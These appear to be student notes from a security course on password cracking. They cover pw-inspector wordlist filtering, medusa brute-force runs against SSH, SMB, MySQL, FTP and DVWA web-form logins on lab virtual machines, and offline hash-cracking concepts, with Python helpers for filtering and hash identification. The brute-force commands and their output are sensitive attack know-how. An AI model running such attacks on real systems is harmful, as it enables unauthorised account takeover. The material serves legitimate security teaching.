[Security Bull (安全牛) study notes] Online password cracking: hydra; online password cracking: medusa; offline password cracking

廖臻
2023-12-01

Online password cracking-----hydra

pw-inspector

    - Filters a wordlist by length and character set

    - pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l

    - pw-inspector -i /usr/share/wordlists/nmap.lst -o P.lst -u

Password cracking efficiency

    - Password complexity (dictionary hit rate)

    - Bandwidth, protocol, server performance, client performance

    - Lockout threshold

    - Maximum number of login requests per unit of time

root@K:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l

root@K:~# cat /usr/share/wordlists/nmap.lst

root@K:~# more p.lst

root@K:~# pw-inspector

PW-Inspector v0.2 (c) 2005 by van Hauser / THC vh@thc.org [http://www.thc.org]

Syntax: pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p -s

Options:

  -i FILE    file to read passwords from (default: stdin)

  -o FILE    file to write valid passwords to (default: stdout)

  -m MINLEN  minimum length of a valid password

  -M MAXLEN  maximum length of a valid password

  -c MINSETS the minimum number of sets required (default: all given)

Sets:

  -l         lowcase characters (a,b,c,d, etc.)

  -u         upcase characters (A,B,C,D, etc.)

  -n         numbers (1,2,3,4, etc.)

  -p         printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)

  -s         special characters - all others not withint the sets above

PW-Inspector reads passwords in and prints those which meet the requirements.

The return code is the number of valid passwords found, 0 if none was found.

Use for security: check passwords, if 0 is returned, reject password choice.

Use for hacking: trim your dictionary file to the pw requirements of the target.

Usage only allowed for legal purposes.

root@K:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l -m 3 -M 5

root@K:~# more p.lst
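As an added example (not from the course notes and not pw-inspector's own code), the following Python reimplements pw-inspector's filtering rules so the effect of -l/-u/-n/-p/-s together with -m/-M/-c can be seen on a constructed wordlist; the same function doubles as the server-side policy check the tool's help text describes (reject a candidate when zero entries pass). Mapping -p to string.punctuation is an assumption about the tool's exact character set.

```python
import string

# Character classes mirroring pw-inspector's -l / -u / -n / -p switches;
# anything outside them counts as -s ("special"). Using string.punctuation
# for -p is an assumption about the tool's exact set.
SETS = {
    "l": set(string.ascii_lowercase),
    "u": set(string.ascii_uppercase),
    "n": set(string.digits),
    "p": set(string.punctuation),
}

def charsets_in(pw):
    # Return the labels (l/u/n/p/s) of the classes this password draws from.
    found = set()
    for ch in pw:
        for label, chars in SETS.items():
            if ch in chars:
                found.add(label)
                break
        else:
            found.add("s")
    return found

def inspect(words, required="", min_len=0, max_len=0, min_sets=None):
    """Filter like `pw-inspector -<required> -m min_len -M max_len -c min_sets`.
    `required` is a string of labels, e.g. "lun" for -l -u -n; by default every
    required class must be present (-c defaults to "all given")."""
    required = set(required)
    if min_sets is None:
        min_sets = len(required)
    kept = []
    for w in words:
        w = w.rstrip("\r\n")
        if not w or w.startswith("#"):   # nmap.lst carries comment lines
            continue
        if len(w) < min_len or (max_len and len(w) > max_len):
            continue
        if len(charsets_in(w) & required) < min_sets:
            continue
        kept.append(w)
    return kept

def meets_policy(candidate, required="lun", min_len=8):
    # Defensive use from the tool's help: "if 0 is returned, reject password choice".
    return len(inspect([candidate], required, min_len=min_len)) > 0

# Constructed stand-in for /usr/share/wordlists/nmap.lst, not the real file.
WORDLIST = ["# comment line, as nmap.lst has at the top", "password", "Passw0rd!",
            "123456", "abc", "abc123", "ABCDEF", "ab"]
```

Calling `inspect(WORDLIST, "l", min_len=3, max_len=5)` corresponds to the `-l -m 3 -M 5` run above, and `meets_policy("password")` is false while `meets_policy("Passw0rd!")` is true.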

Online password cracking-----medusa

Drawbacks of Hydra

    - Poor stability; the program crashes frequently

    - Poor speed control; easily triggers service blocking or account lockout mechanisms

    - Spawns a new process per host and a new instance per service

    - Poor performance when attacking a large number of targets

Features of Medusa

    - Good stability

    - Proper speed control

    - Thread-based

    - Supports fewer modules than hydra (no RDP support)

    - WEB-Form support is flawed

root@k:~# medusa -h

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

medusa: option requires an argument -- 'h'

CRITICAL: Unknown error processing command-line options.

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

  -h [TEXT]    : Target hostname or IP address

  -H [FILE]    : File containing target hostnames or IP addresses

  -u [TEXT]    : Username to test

  -U [FILE]    : File containing usernames to test

  -p [TEXT]    : Password to test

  -P [FILE]    : File containing passwords to test

  -C [FILE]    : File containing combo entries. See README for more information.

  -O [FILE]    : File to append log information to

  -e [n/s/ns]  : Additional password checks ([n] No Password, [s] Password = Username)

  -M [TEXT]    : Name of the module to execute (without the .mod extension)

  -m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a

                 different parameter each time and they will all be sent to the module (i.e.

                 -m Param1 -m Param2, etc.)

  -d           : Dump all known modules

  -n [NUM]     : Use for non-default TCP port number

  -s           : Enable SSL

  -g [NUM]     : Give up after trying to connect for NUM seconds (default 3)

  -r [NUM]     : Sleep NUM seconds between retry attempts (default 3)

  -R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.

  -c [NUM]     : Time to wait in usec to verify socket is available (default 500 usec).

  -t [NUM]     : Total number of logins to be tested concurrently

  -T [NUM]     : Total number of hosts to be tested concurrently

  -L           : Parallelize logins using one username per thread. The default is to process 

                 the entire username before proceeding.

  -f           : Stop scanning host after first valid username/password found.

  -F           : Stop audit after first valid username/password found on any host.

  -b           : Suppress startup banner

  -q           : Display module's usage information

  -v [NUM]     : Verbose level [0 - 6 (more)]

  -w [NUM]     : Error debug level [0 - 10 (more)]

  -V           : Display version

  -Z [TEXT]    : Resume scan based on map of previous scan

root@k:~# medusa -d

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

  Available modules in "." :

  Available modules in "/usr/lib/medusa/modules" :

    + cvs.mod : Brute force module for CVS sessions : version 2.0

    + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1

    + http.mod : Brute force module for HTTP : version 2.1

    + imap.mod : Brute force module for IMAP sessions : version 2.0

    + mssql.mod : Brute force module for M$-SQL sessions : version 2.0

    + mysql.mod : Brute force module for MySQL sessions : version 2.0

    + nntp.mod : Brute force module for NNTP sessions : version 2.0

    + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0

    + pop3.mod : Brute force module for POP3 sessions : version 2.0

    + postgres.mod : Brute force module for PostgreSQL sessions : version 2.0

    + rexec.mod : Brute force module for REXEC sessions : version 2.0

    + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0

    + rsh.mod : Brute force module for RSH sessions : version 2.0

    + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1

    + smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1

    + smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0

    + snmp.mod : Brute force module for SNMP Community Strings : version 2.1

    + svn.mod : Brute force module for Subversion sessions : version 2.1

    + telnet.mod : Brute force module for telnet sessions : version 2.0

    + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0

    + vnc.mod : Brute force module for VNC sessions : version 2.1

    + web-form.mod : Brute force module for web forms : version 2.1

    + wrapper.mod : Generic Wrapper Module : version 2.0

Online password cracking-----medusa

medusa -d

Cracking Windows passwords

    - medusa -M smbnt -h 1.1.1.1 -u administrator -P pass.lst -e ns -F

Cracking Linux SSH passwords

    - medusa -M ssh -h 192.168.20.10 -u root -P pass.lst -e ns -F

Cracking passwords for other services

    - medusa -M mysql -h 1.1.1.1 -u root -P pass.lst -e ns -F

    - medusa -h 1.1.1.1 -u admin -P pass.lst -M web-form -m FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-DATA:"post?user=username&pas=password&Login=Login"

msfadmin@metasploitable:~$ sudo passwd root

[sudo] password for msfadmin:

Enter new UNIX password:

Retype new UNIX password:

No password supplied

Enter new UNIX password:

Retype new UNIX password:

passwd: password updated successfully

root@K:~# medusa -M ssh -h 192.168.1.113 -e ns -F -u root -P /usr/share/wordlists/nmap.lst

root@K:~# grep 1234 /usr/share/wordlists/nmap.lst

root@K:~# grep ^1234% /usr/share/wordlists/nmap.lst

root@K:~# cat /usr/share/wordlists/nmap.lst | grep -v '#'

root@K:~# cat /usr/share/wordlists/nmap.lst | grep -v '#' > pass.lst

root@K:~# medusa -M ssh -h 192.168.1.113 -e ns -f -u root -P pass.lst

The XP machine's IP address is 192.168.1.118

C:\net user administrator zipper

root@K:~# medusa -M smbnt -h 192.168.1.118 -u administrator -P pass.lst -e ns -f

root@K:~# nmap -p3306 192.168.1.113

Starting Nmap 7.12 ( https://nmap.org ) at 2016-04-21 23:00 CST

Nmap scan report for 192.168.1.113

Host is up (10.00036s latency).

PORT      STATE SERVICE

3306/tcp  open  mysql

MAC Address: 08:00:27:B0:3A:76 (Oracle Virtualbox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds

root@K:~# medusa -M mysql -h 192.168.1.113 -e ns -F -u root -P pass.lst

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [mysql] Host: 192.168.1.113 (1 of 1, 0 complete) User: root (1 of 5000 complete) Password: (1 of  5000 complete)

ACCOUNT CHECK: [mysql] Host: 192.168.1.113 User: root Password:  [SUCCESS]

root@K:~# medusa -M ftp -h 192.168.1.113 -e ns -F -u ftp -P pass.lst

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>


root@K:~# medusa -M ftp -h 192.168.1.113 -e ns -F -u ftp -P pass.lst -n 2121

root@K:~# medusa -h 192.168.1.113 -u admin -P pass.lst -M web-form -m FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-DATA:"post?user=username&pas=password&Login=Login"

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ERROR: The answer was NOT successfully received, understood, and accepted while trying admin 123456: error code  302

ACCOUNT CHECK: [web-form] Host: 192.168.1.113 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 123456 (1 of 4998 complete)

root@K:~# medusa -M web-form -q

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

web-form.mod (2.1) Luciano Bello <luciano@linux.org.ar> :: Brute force module for web forms

Available module options:

  USER-AGENT:?       User-agent value. Default: "I'm not Mozilla, I'm Ming Mong".

  FORM:?             Target form to request. Default: "/"

  DENY-SIGNAL:?      Authentication failure message. Attempt flagged as successful if text is not present in

                     server response. Default: "Login incorrect"

  CUSTOM-HEADER:?    Custom HTTP header.

                     More headers can be defined by using this option several times.

  FORM-DATA:<METHOD>?<FIELDS>

                     Methods and fields to send to web service. Valid methods are GET and POST. The actual form

                     data to be submitted should also be defined here. Specifically, the fields: username and

                     password. The username field must be the first, followed by the password field.

                     Default: "post?username=&password="

Usage example: "-M web-form -m USER-AGENT:"g3rg3 gerg" -m FORM:"webmail/index.php" -m DENY-SIGNAL:"deny!"

                 -m FORM-DATA:"post?user=&pass=&submit=True" -m CUSTOM-HEADER:"Cookie: name=value"

Online password cracking-----medusa

    - -n : non-default port

    - -s : use an SSL connection

    - -T : number of hosts tested concurrently

medusa -M ftp -q

root@k:~# medusa -M ftp -q

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ftp.mod (2.1) pMonkey <pmonkey@foofus.net> :: Brute force module for FTP/FTPS sessions

Available module options:

MODE:? (NORMAL*, EXPLICIT, IMPLICIT)

  EXPLICIT: AUTH TLS Mode as defined in RFC 4217

     Explicit FTPS (FTP/SSL) connects to a FTP service in the clear. Prior to

     sending any credentials, however, an "AUTH TLS" command is issued and a

     SSL session is negotiated.

  IMPLICIT: FTP over SSL (990/tcp)

     Implicit FTPS requires a SSL handshake to be performed before any FTP

     commands are sent. This service typically resides on tcp/990. If the user

     specifies this option or uses the "-n" (SSL) option, the module will

     default to this mode and tcp/990.

  NORMAL

     The default behaviour if no MODE is specified. Authentication is attempted

     in the clear. If the server requests encryption for the given user,

     Explicit FTPS is utilized.

Example Usage:

    medusa -M ftp -h host -u username -p password

    medusa -M ftp -s -h host -u username -p password

    medusa -M ftp -m MODE:EXPLICIT -h host -u username -p password

(*) Default value

Offline password cracking

Authentication

    - Never transmit passwords in plaintext

    - Transmit a hash of the password for each authentication (hashes are easy to compute but hard to reverse)

    - The server-side user database should store passwords salted and hashed

Cracking approach

    - Sniff the password hash from the network

    - Exploit a vulnerability to log in to the server and obtain password hashes from the user database

    - Identify the hash type

      by length and character set

    - Use an offline cracking tool to match the password hash

Offline password cracking

Advantages

    - Offline cracking does not trigger the password lockout mechanism

    - It does not generate large numbers of failed-login log entries that would draw the administrator's attention

Hash identification tools

    - hash-identifier

    - Hashid

    - May misidentify a hash or fail to identify it at all

Firefox add-on: hashr

These notes were taken by a Security Bull (安全牛) classroom student; the course itself and other information-security material are available from the Security Bull classroom.
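To make the "identify by length and character set" step concrete, here is an added Python example (written for these notes; it is not the code of hash-identifier or hashid) that classifies a hash by format prefix first and by hex digest length second. The result is deliberately a list of candidates: a bare 32-hex string could be MD5, NTLM, LM or MD4, which is exactly why such tools can misidentify. The sample password hashed in demo() is constructed; salted crypt variants with a rounds= field are not handled.

```python
import hashlib
import re

# Hex-only digests keyed by length. Several algorithms share a length, so the
# answer is a list of candidates, never a single certain type.
HEX_CANDIDATES = {
    16: ["MySQL (pre-4.1)"],
    32: ["MD5", "NTLM", "LM", "MD4"],
    40: ["SHA-1", "RIPEMD-160", "MySQL 4.1+ (missing leading *)"],
    56: ["SHA-224"],
    64: ["SHA-256", "SHA3-256"],
    96: ["SHA-384"],
    128: ["SHA-512", "Whirlpool"],
}

# Schemes with a recognisable prefix or layout; checked before raw length
# because the prefix identifies them unambiguously.
PREFIX_RULES = [
    (r"\*[0-9A-F]{40}", "MySQL 4.1+"),
    (r"\$1\$[^$]{1,8}\$[./0-9A-Za-z]{22}", "MD5-crypt"),
    (r"\$5\$[^$]{1,16}\$[./0-9A-Za-z]{43}", "SHA-256-crypt"),
    (r"\$6\$[^$]{1,16}\$[./0-9A-Za-z]{86}", "SHA-512-crypt"),
    (r"\$2[abxy]\$\d{2}\$[./0-9A-Za-z]{53}", "bcrypt"),
    (r"[^:]+:\d+:[0-9a-fA-F]{32}:[0-9a-fA-F]{32}:::", "pwdump line (LM:NT)"),
]

def identify(h):
    """Return candidate hash types for h; an empty list means 'cannot identify'."""
    h = h.strip()
    for pattern, name in PREFIX_RULES:
        if re.fullmatch(pattern, h):
            return [name]
    if re.fullmatch(r"[0-9a-fA-F]+", h):
        return HEX_CANDIDATES.get(len(h), [])
    return []

def demo():
    # Constructed sample password hashed locally; shows how much, and how
    # little, length alone reveals. MySQL 4.1+ is "*" + upper(SHA1(SHA1(pw))).
    pw = b"Passw0rd!"
    return {
        "md5": identify(hashlib.md5(pw).hexdigest()),
        "sha1": identify(hashlib.sha1(pw).hexdigest()),
        "sha256": identify(hashlib.sha256(pw).hexdigest()),
        "mysql": identify("*" + hashlib.sha1(hashlib.sha1(pw).digest()).hexdigest().upper()),
        "unknown": identify("not-a-hash!"),
    }

if __name__ == "__main__":
    for kind, candidates in demo().items():
        print(kind, "->", candidates or "unidentified")
```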
